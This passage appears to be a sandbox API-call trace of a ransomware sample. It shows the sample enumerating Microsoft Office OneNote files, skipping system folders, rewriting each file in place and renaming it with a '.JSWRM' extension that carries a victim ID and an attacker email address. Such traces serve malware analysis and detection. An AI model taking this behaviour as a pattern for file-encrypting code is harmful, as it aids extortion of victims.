nNumberOfBytesToWrite=0x2e50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2e50, lpOverlapped=0x0) returned 1 [0137.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0137.619] CloseHandle (hObject=0x238) returned 1 [0137.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0137.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0137.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0137.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0137.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0137.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote.cat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote.cat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote.cat.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote.cat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0137.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0137.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0137.621] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c884dc0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c884dc0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x265e, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="prnSendToOneNote_win7.cat", cAlternateFileName="PRNSEN~1.CAT")) returned 1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2=".") returned 1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="..") returned 1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="...") returned 1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="windows") returned -1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="recovery") returned -1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="perflogs") returned 1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="documents and settings") returned 1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="$RECYCLE.BIN") returned 1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="system volume information") returned -1 [0137.621] lstrcmpiW (lpString1="prnSendToOneNote_win7.cat", lpString2="msocache") returned 1 [0137.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote_win7.cat", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0137.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote_win7.cat", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prnSendToOneNote_win7.cat", lpUsedDefaultChar=0x0) returned 25 [0137.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote_win7.cat", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0137.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote_win7.cat", cchWideChar=25, lpMultiByteStr=0x241358, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prnSendToOneNote_win7.cat", lpUsedDefaultChar=0x0) returned 25 [0137.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote_win7.cat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote_win7.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.622] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9822) returned 1 [0137.622] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.622] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2650, lpOverlapped=0x0) returned 1 [0137.624] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.624] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2650, lpOverlapped=0x0) returned 1 [0137.625] CloseHandle (hObject=0x238) returned 1 [0137.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote_win7.cat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote_win7.cat"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote_win7.cat.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote_win7.cat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.626] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c884dc0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c884dc0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6fe, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="prnSendToOneNote_win7.inf", cAlternateFileName="PRNSEN~1.INF")) returned 1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2=".") returned 1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="..") returned 1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="...") returned 1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="windows") returned -1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="recovery") returned -1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="perflogs") returned 1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="documents and settings") returned 1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="$RECYCLE.BIN") returned 1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="system volume information") returned -1 [0137.626] lstrcmpiW (lpString1="prnSendToOneNote_win7.inf", lpString2="msocache") returned 1 [0137.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote_win7.inf", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0137.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote_win7.inf", cchWideChar=25, lpMultiByteStr=0x241178, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prnSendToOneNote_win7.inf", lpUsedDefaultChar=0x0) returned 25 [0137.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote_win7.inf", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0137.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="prnSendToOneNote_win7.inf", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prnSendToOneNote_win7.inf", lpUsedDefaultChar=0x0) returned 25 [0137.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote_win7.inf" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote_win7.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.627] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1790) returned 1 [0137.627] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.627] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x6f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x6f0, lpOverlapped=0x0) returned 1 [0137.629] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.629] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x6f0, lpOverlapped=0x0) returned 1 [0137.629] CloseHandle (hObject=0x238) returned 1 [0137.629] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote_win7.inf" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote_win7.inf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\prnSendToOneNote_win7.inf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\prnsendtoonenote_win7.inf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.630] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c884dc0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c884dc0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="SendToOneNote-manifest.ini", cAlternateFileName="SENDTO~1.INI")) returned 1 [0137.630] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2=".") returned 1 [0137.630] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="..") returned 1 [0137.630] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="...") returned 1 [0137.630] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="windows") returned -1 [0137.630] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="recovery") returned 1 [0137.630] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="perflogs") returned 1 [0137.630] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="documents and settings") returned 1 [0137.631] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="$RECYCLE.BIN") returned 1 [0137.631] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="system volume information") returned -1 [0137.631] lstrcmpiW (lpString1="SendToOneNote-manifest.ini", lpString2="msocache") returned 1 [0137.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote-manifest.ini", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0137.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote-manifest.ini", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNote-manifest.ini", lpUsedDefaultChar=0x0) returned 26 [0137.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote-manifest.ini", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0137.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote-manifest.ini", cchWideChar=26, lpMultiByteStr=0x241100, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNote-manifest.ini", lpUsedDefaultChar=0x0) returned 26 [0137.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote-manifest.ini" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote-manifest.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.632] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=360) returned 1 [0137.632] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.632] ReadFile (in: hFile=0x238, lpBuffer=0x234a30, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x234a30*, lpNumberOfBytesRead=0x345e89c*=0x160, lpOverlapped=0x0) returned 1 [0137.633] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.633] WriteFile (in: hFile=0x238, lpBuffer=0x234a30*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x234a30*, lpNumberOfBytesWritten=0x345e898*=0x160, lpOverlapped=0x0) returned 1 [0137.633] CloseHandle (hObject=0x238) returned 1 [0137.633] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote-manifest.ini" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote-manifest.ini"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote-manifest.ini.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote-manifest.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.634] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c884dc0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c884dc0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="SendToOneNote-PipelineConfig.xml", cAlternateFileName="SENDTO~1.XML")) returned 1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2=".") returned 1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="..") returned 1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="...") returned 1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="windows") returned -1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="recovery") returned 1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="perflogs") returned 1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="documents and settings") returned 1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="$RECYCLE.BIN") returned 1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="system volume information") returned -1 [0137.634] lstrcmpiW (lpString1="SendToOneNote-PipelineConfig.xml", lpString2="msocache") returned 1 [0137.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote-PipelineConfig.xml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0137.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote-PipelineConfig.xml", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNote-PipelineConfig.xml", lpUsedDefaultChar=0x0) returned 32 [0137.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote-PipelineConfig.xml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0137.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote-PipelineConfig.xml", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNote-PipelineConfig.xml", lpUsedDefaultChar=0x0) returned 32 [0137.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote-PipelineConfig.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote-pipelineconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.635] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=506) returned 1 [0137.635] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.635] ReadFile (in: hFile=0x238, lpBuffer=0x231078, nNumberOfBytesToRead=0x1f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x231078*, lpNumberOfBytesRead=0x345e89c*=0x1f0, lpOverlapped=0x0) returned 1 [0137.636] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.636] WriteFile (in: hFile=0x238, lpBuffer=0x231078*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x231078*, lpNumberOfBytesWritten=0x345e898*=0x1f0, lpOverlapped=0x0) returned 1 [0137.636] CloseHandle (hObject=0x238) returned 1 [0137.636] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote-PipelineConfig.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote-pipelineconfig.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote-PipelineConfig.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote-pipelineconfig.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.639] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c884dc0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c884dc0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2560, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="SendToOneNote.gpd", cAlternateFileName="SENDTO~1.GPD")) returned 1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2=".") returned 1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="..") returned 1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="...") returned 1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="windows") returned -1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="recovery") returned 1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="perflogs") returned 1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="documents and settings") returned 1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="$RECYCLE.BIN") returned 1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="system volume information") returned -1 [0137.639] lstrcmpiW (lpString1="SendToOneNote.gpd", lpString2="msocache") returned 1 [0137.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote.gpd", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote.gpd", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNote.gpd", lpUsedDefaultChar=0x0) returned 17 [0137.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote.gpd", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote.gpd", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNote.gpd", lpUsedDefaultChar=0x0) returned 17 [0137.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, 